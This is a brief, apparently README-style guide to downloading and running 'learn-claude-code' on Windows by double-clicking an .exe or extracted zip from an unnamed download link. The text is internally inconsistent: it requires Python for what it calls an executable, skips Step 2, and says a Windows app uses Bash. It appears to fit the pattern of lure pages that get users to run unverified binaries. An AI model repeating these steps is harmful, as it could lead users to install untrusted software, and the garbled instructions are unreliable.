To run learn-claude-code on your Windows PC, make sure you have the following:

  • 500 MB of free disk space for installation and temporary files

  • Python 3.8 or newer installed (learn-claude-code requires Python runtime)

Step 1: Download the software

Download learn-claude-codeOnce on the page:

  • Find the file named something like learn-claude-code-windows.exe or a .zip file for Windows.
  • Download this file to a folder you can easily access, like your Desktop or Downloads folder.

learn-claude-code requires Python 3.8 or newer. If you already have Python installed:

  • Open Command Prompt (press Windows key, type cmd, and hit Enter).
  • Type python --version and press Enter.
  • If the version is 3.8 or higher, skip to Step 3.

Step 3: Run learn-claude-code

If you downloaded an .exe file:

  • Double-click the file.
  • A window will open and start the application.
  • Follow any on-screen instructions.

If you downloaded a .zip file:

  • Right-click the file.
  • Choose Extract All and pick a destination folder.
  • Open the folder.
  • Find learn-claude-code.exe or a similar file.
  • Double-click to start the app.

Step 4: Using the application

Once running, you will see a simple command window with clear prompts. The agent will ask for input or offer options. This tool is designed to be easy for beginners.

  • Read the instructions on the screen.
  • Type your commands or replies and press Enter.
  • The agent processes your input and responds.

The app uses basic Bash commands, which are explained within the interface. This allows you to learn by doing without extra setup.
